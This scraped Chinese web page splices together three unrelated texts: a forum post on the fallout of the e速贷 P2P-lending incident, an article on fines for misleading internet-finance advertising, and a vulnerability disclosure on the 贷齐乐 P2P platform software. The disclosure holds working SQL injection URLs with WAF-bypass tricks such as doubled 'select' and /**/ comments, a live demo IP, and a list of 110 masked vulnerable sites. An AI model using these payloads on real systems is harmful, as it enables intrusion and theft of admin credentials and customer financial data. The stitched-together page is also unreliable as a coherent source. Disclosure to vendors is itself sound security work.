来源:蜘蛛抓取(WebSpider)
时间:2016-10-18 10:06
标签:
网贷的危害
400-882-1802
周一至周五 9:00 -18:00
投资人QQ群
网贷之家官方App
所有网贷人都在这里
五花八门的话题与观点,尽在交流区
e速贷事件对网贷行业的一些影响
本帖最后由 魔神 于
长夜慢慢,难以入睡。
这几天e速贷事件不断发酵,牵涉到数以万计的行业内投资人,平台管理人员甚至的关注。在此我就e速贷事件对的影响进行大胆推测,希望能对参与网贷人群有一定的帮助和参考价值。
先来说投资人,e速贷虽然平台规模不大,但是也不算小平台,尤其是它成立时间久,在业内口碑还算不做,因此这一批e速贷的投资人一般比较理性,主要是以为原则投资不同的平台降低其投资风险,e速贷只是他们资金配比的一部分,无非仓位比例不同。由于这次事件,导致其中一大投资人对网贷原有的选择标准产生质疑,甚至认为网贷已经没有希望,从而产生不顾一切歇斯底里的出逃,不管哪个平台有可余额就提现,代收能的就转让,当然还有一小部分e速贷投资人已经面临资金链即将断链甚至已经断链的窘迫状态,被逼撤退其他平台的投资以补充自己资金,我相信很多平台已经开始注意到一些情况,比如升高,速度降低,这种情况如果得不到有效控制,将大大提高各自平台的概率,当蝴蝶效益产生威力将是整个行业的灾难,势必会形成行业恶性循环。希望各个平台采取有效措施遏制恐慌情绪蔓延。
在来说借款人,有人会觉得奇怪,e速贷事件关借款人什么事情,甚至有人恶意的认为借款人很开心的不需要还钱了。我想说这种想法非常的偏见和不知所谓。目前网贷基本以为主,以房产抵押标为例,100w价值的房子,大概7折,平台给他70w的借款资格,当e速贷事件后,他们只要有还款能力很少会为了70w的借款而丢掉100w价值的房子不要。现在的情况就是借款人想还钱不知道还给谁,也不敢还。因为没有平台配合解除抵押,还了钱拿不回抵押权利,但是他们的利息怎么付,需不需要支付罚息,能不能续借这些问题都是很让他们头疼的事情。更重要的是让他们被迫信用降低或者信用破产,直白点说,借款人辛辛苦苦在平台里面维持的优质还款记录被打破。当然说这些不是为了去替e速贷的借款人去考虑可行办法,而是想通过这些告诉各位因为这个事情会让借款人在网贷上借钱产生顾虑,比较诚信的借款人还是占网贷的大部分,当这种事情再次发生,他们该怎么办,所以借款人会重新思量到底要不要通过网贷这个渠道去融资,对于他们来说,融资最怕的就是借钱变成变卖抵押物,因为线下这种不正规公司不是没做过这种事情,当他们产生这种顾虑,是会影响各个平台的业务量的,当大量借款人认为网贷融资风险巨大的时候,各个平台的品牌价值降低,甚至到最后可能会造成为了争取借款人来融资降低自身分控要求的事情从而加大运营风险。
然后就平台来说,e速贷事件的结果就是一个隐形的监管底线出现,是一个活生生的案例,不管它最后是死是活都已经成为了行业的标杆。现在不知道有多少平台的运营人等待的这个结果出现。
水平有限,大家谅解,如果有其他想法欢迎讨论。
本人08年开始投资网贷,网贷已经是我生活不可缺少的一部分。投入的不只是金钱更多的是对这个行业的感情。真切希望行业能够继续发展,受法律保护。
注:虽然我有e速贷股权若干,但是我觉得我的分析是客观的,是值得大家思考的。e速贷不管结局如何,我不会后悔。投资有风险,网贷需谨慎。
文章关键词:
大爷给个赏钱吧~~您的激励是楼主前进的动力!
(1246积分)
相关推荐:
网贷之家官方App
投资人QQ群
网贷咨询热线
400-882-1802
周一至周五 9:00-18:00
投资人QQ群
沪公网安备 45号
你还可以输入500字
操作原因:
操作原因不能为空
您确认要 删除 选择的主题么?
操作原因:
请选择理由
操作原因不能为空
操作原因:
操作原因不能为空
操作原因:
操作原因不能为空
操作原因:
操作原因不能为空
用户已被警告 0 次
操作原因:
请选择理由
操作原因不能为空
目标板块:
操作原因:
请选择理由
操作原因不能为空据媒体公开报道,去年以来多地工商部门因P2P平台虚假宣传,开出的罚单多达数起,且多数发生在上海,总计罚款超过340万。随着各地互联网金融广告专项整治行动的推进,下半年或有更多罚单产生。在此,提醒平台,广告有风险,推广需谨慎。
互金广告专项整治工作已下沉至县、区一级
近日,北京市工商局对外表示,将在下半年开展互联网金融广告专项整治行动。
月份,工商总局部署了互联网金融广告专项整治工作。此后,陆续传出各省表示将对互联网金融广告进行整治的消息。从目前来看,部分省份对互联网金融广告的整治工作已经由省级政府下沉至县、区甚至乡镇一级政府,这也意味着整治工作已经由纸上布局进入执行阶段。
以远在西南的贵阳为例,该市观山湖区目前已成立互联网金融风险整治工作领导小组,就整治
网络借贷、互联网金融广告等制订了《贵阳市观山湖区互联网金融风险整治工作实施方案》,并将区内超过
家企业(平台)纳入排查整治范畴。
月初,河南省工商局召开全省开展互联网金融广告及以投资理财名义从事金融活动风险专项整治工作电视电话会议。从该省部分县级政府官网可以看到,永城等地方也已成立了“专项整治领导小组”,并下达了要求各分局加大辖区摸排力度的命令。
此外,从最近公开的报道可以看到,武汉江岸区、福建光泽县、江苏盱眙县、马鞍山花山区湖东路街道等各省的县、区级乃至乡镇级政府均纷纷开启了对包括互联网金融广告在内的互联网金融专项整顿。
重点整治九大踩红线行为
月,工商总局等十七部门印发了《关于开展互联网金融广告及以投资理财名义从事金融活动风险专项整治工作实施方案》,部署开展互联网金融广告专项整治工作。该实施方案给互联网金融划定了
条红线,包括不得无风险提示、不得承诺收益、不得利用名人代言、不得虚假、夸大宣传等。
一是违法广告法相关规定,对金融产品或服务未合理提示或警示可能存在的风险以及承担风险责任的。
二是对未来效果、收益或做出保证性承诺,明示或者暗示保本、无风险或者保收益的。
三是夸大后者片面宣传金融服务或者金融产品,在未提供客观证据的情况下,对过往业绩做出虚假或夸大表述的。
四是利用学术机构、行业协会、专业人士、受益者的名义或者形象作推荐、证明的。
五是对投资理财类产品的收益、安全性等情况进行虚假宣传,欺骗和误导消费者的。
六是未经有关部门许可,以投资理财、投资咨询、贷款中介、信用担保、典当等名义发布的吸收存款、信用贷款内容的广告。
七是引用不真实、不准确数据和资料的。
八是宣传国家有关法律法规和行业主管部门命令禁止的违法活动内容的。
九是宣传提供突破住房信贷政策的金融产品,加大购房杠杆的。
平台因虚假宣传领天价罚款
互联网金融广告乱象由来已久,去年翼龙贷因一举夺得“央视标王”称号,将其推上舆论风口浪尖,然而随着某宝被查,曾经为某宝播发广告的央视陷入短暂危机,最终导致央视对互联网金融广告进行清理,“央视标王”翼龙贷,以及紫马财行等互金平台央视广告计划就此作罢。
在专项整顿启动以前,地方政府对这些乱象的整治也并非没有动作。事实上,在此之前,地方政府对互金广告乱象的整顿也并没表现出手软。在互金广告专项整治之前,即有
平台因虚假宣传被罚
平台永利宝在部分城市进行了楼宇电视广告投放,因广告中含有的“亿元救市”、“
本息安全”等内容与实际情况不符,被当地市场监督管理局认定为虚假内容。最终,永利宝因违反了《中华人民共和国广告法》第四条“广告不得含有虚假的内容,不得欺骗和误导消费者”的规定,而被处以广告费用两倍罚款——
同月,善林金融也因虚假宣传受到处罚。上海工商局对善林金融的行政处罚决定书显示,鉴于当事人虚假宣传行为的传播范围大,受众面广且情节较为恶劣,处以
万元罚款。
2015年8月,
恒昌财富也因虚假宣传受到处罚。北京工商局顺义分局判定恒昌财富宣传材料中“月利通”、“固定期限出借”、“恒昌宝”产品宣传材料均设有“案例板块”,“定利宝”产品宣传材料设有“财富管理案例”板块内容为虚构,上述案例内容为客户通过当事人出借资金获得收益,对此,恒昌财富被处以
万元罚款。
月份,上海市工商部门发出
号虚假违法广告公告,对
年以来遭查处的
个典型案例予以曝光,其中有
。根据曝光内容,上海虹亿金融信息服务有限公司因虚构“年放贷额超
亿元、年金融信息服务总量达
亿元、建立了
人的专业团队、成功控股内蒙白云岩矿(镁矿)有限公司、与上海浦东发展银行等众多银行机构签约了长期合作关系”等宣传内容,最终被有关部门依法判处罚款
万元。另有
公司因虚假宣传分别被判处
万元罚款。
除了虚假宣传外,还有
平台因在宣传中贬低对手而被处罚。今年
月,南宁市一家互联网金融公司因在网站发布自己的理财产品收益是银行产品的
倍等信息,被当地工商局经检支队判定违反新《广告法》中“广告不得贬低其他生产经营者的商品或者服务”的规定。这家公司最终被责令限期改正相关宣传。
解读政府工作报告中的“规范发展互联网金融”
一半P2P平台已出局
不少公司打算换概念再玩
P2P第二个万亿用时缩短
巨头贡献近半成交额
互金常务理事丨18家透明
接入央行征信丨
接入银行存管
牌照资源平台丨互金协会成员
一体化平台
访英随行代表
网贷朋友圈
网贷巨头规模
标杆案例丨
百亿平台丨低调CEO
本文来自微信公众账号提交,由微信啦收录,转载请注明出处。
微信扫码 分享文章分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
现在全国百分之七十以上的借贷网站都是用贷齐乐系统搭建的
详细说明:
产品:贷齐乐系统
厂商:/ 网贷系统|网贷系统开发|p2p借贷系统源码-宁波贷齐乐网络科技有限公司
宁波贷齐乐网络科技有限公司是一家专业从事P2P网络借贷平台开发的战略性电子商务有限公司,坐落于美丽港湾-宁波(南部商务区),在国内是最领先的P2P在线借贷平台开发供应商之一,提供在线智能融资的电子商务P2P平台。
贷齐乐经过多年研发的P2P网络贷款中介系统,已经成功帮助多个平台顺利上线运营,且在数月之内冲值金额达到数千万元。特别成功月交易量1000万以上的平台有400多家,正在施工建设的有50来家。
SQL注入点其实是很多的,但是也有WAF,都是一些比较简单的WAF可以直接绕过去,可以直接注出管理员账户密码,但是这里我还不清楚字段和表是什么。下面注入点有一些需要禁用Javascript才能正常测试,否则提示登录,我们来简单的做测试。
第一处SQL注入:
code 区域/plugins/?q=area&area_id=1
area_id存在注入;站点百分百存在该注入,这个注入最有用了
以官方demo来看,这个注入点是存在过滤的,而且各种不同的站点还有不同的过滤方法,有些站点甚至根本没有过滤~
的确是存在注入,但是过滤了select之类的;可以双写select来绕过WAF。
code 区域http://121.40.166.230:10021/plugins/?q=area&area_id=-1 union selselectect 1,current_user,3,4,5,6%23
再看某个站点居然没有过滤select只过滤了空格,可以用/**/绕过
SQLMAP加上tamper轻松自然的注入啊!
第二处SQL:
code 区域/bbs/main.html?q=reply&action=quote&tid=48/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,4,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
99%的站点存在该注入漏洞
以官方demo来看这个注入,虽然的确过滤了空格,而且在输出的时候没有进行解码,另外似乎也过滤了括号,但是支持union不影响我们可以读取到管理员的信息啊。
试试其它的站点也是依然存在的,
第三处SQL注入:
code 区域/bbs/main.html?q=reply&action=reply&tid=1/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,4,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&f=1 和上门一样action方法不一样而已
https的案例测试:
第四处SQL注入:
code 区域/creditshop/main.html?classid=1/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,current_user,5,6,7,8,9,10,11 classid也存在注入过滤但不影响读取管理员或者其它信息
第五处SQL注入:
code 区域/creditshop/product/main.html?id=1/**/and/**/0/**/UNION/**/SELECT/**/1,2,3,current_user,5,6,7,8,9,10,11
其实还有一些注入需要截断的,但以本人的技术还没办法绕过这些WAF,但也必须提出来一下~
求各位大牛绕过。
以下部分需要登录。
code 区域http://121.40.166.230:10021/?ask&status=%273 求截断
第七处:code 区域http://121.40.166.230:10021/index.php?user&q=code/borrow/gathering&status=0'&page=
需要登录,求截断
第八处:code 区域http://121.40.166.230:10021/creditshop/main.html?classid=&price=0,;&order= price存在注入,求截断以及绕过长度限制
不多说了。
漏洞证明:
给案例加点马赛克保护资金吧、
可以看到还有大量https的站点,危害可想而知
官方demo:http://121.40.166.230:10021/
mask 区域1.http://**.**.**/plugins/q=area&area_id=-1%27_
2.http://**.**.**/plugins/q=area&area_id=-1%27_
3.http://**.**.**/plugins/q=area&area_id=-1%27_
4.http://**.**.**/plugins/q=area&area_id=-1%27_
5.http://**.**.**/plugins/q=area&area_id=-1%27_
6.http://**.**.**/plugins/q=area&area_id=-1%27_
7.http://**.**.**//plugins/q=area&area_id=-1%27_
8.http://**.**.**/plugins/q=area&area_id=-1%27_
9.http://**.**.**/plugins/q=area&area_id=-1%27_
10.http://**.**.**//plugins/q=area&area_id=-1%27_
11.http://**.**.**/plugins/q=area&area_id=-1%27_
12.http://**.**.**/plugins/q=area&area_id=-1%27_
13.http://**.**.**//plugins/q=area&area_id=-1%27_
14.http://**.**.**/plugins/q=area&area_id=-1%27_
15.http://**.**.**/plugins/q=area&area_id=-1%27_
16.http://**.**.**/plugins/q=area&area_id=-1%27_
17.http://**.**.**/plugins/q=area&area_id=-1%27_
18.http://**.**.**/plugins/q=area&area_id=-1%27_
19.http://**.**.**//plugins/q=area&area_id=-1%27 _
20.https://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
21.https://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
22.https://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
23.https://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
24.https://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
25.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
26.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
27.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
28.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
29.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
30.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
31.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
32.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
33.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
34.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
35.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
36.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
37.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
38.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
39.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
40.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
41.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
42.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
43.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
44.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
45.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
46.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
47.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
48.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
49.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
50.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
51.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
52.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
53.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
54.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
55.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
56.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
57.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
58.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
59.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
60.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
61.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
62.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
63.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
64.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
65.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
66.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
67.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
68.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
69.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
70.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
71.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
72.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
73.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
74.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
75.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
76.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
77.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
78.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
79.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
80.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
81.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
82.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
83.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
84.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
85.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
86.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
87.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
88.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
89.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
90.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
91.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
92.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
93.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
94.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
95.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
96.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
97.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
98.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
99.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
100.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
101.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
102.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
103.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
104.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
105.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
106.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
107.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
108.http://**.**.**//bbs/main.htmlq=reply&action=quote&tid=%2748_
109.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748_
110.http://**.**.**/bbs/main.htmlq=reply&action=quote&tid=%2748
修复方案:
通知厂商修复就是了
版权声明:转载请注明来源 @
厂商回应:
危害等级:中
漏洞Rank:8
确认时间: 16:10
厂商回复:
非常感觉,我们极其注重安全,会及时处理的
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
某网贷通用系统SQL注入,可影响100多家P2P公司。。
look这篇文章,//08/03/.htm,最安全P2P网贷系统“花落贷齐乐”
这个洞要火
我擦,我也随便测下就发现个sql漏洞
0.0 好吧,捂了大半年的漏洞终于被人公布了,,,
8分 看不出来你们重视安全。 呵呵。
这才8分??
非常感觉是一种什么样的感觉
非常重视给个Rank 8么
突然想起一个词
叫做十动然拒
这个洞非常严重,那我就给你8rank吧!
不划算 - -
去年的时候,人手一堆网贷系统的洞。后面好多网贷平台都跑去自己开发了。。
登录后才能发表评论,请先
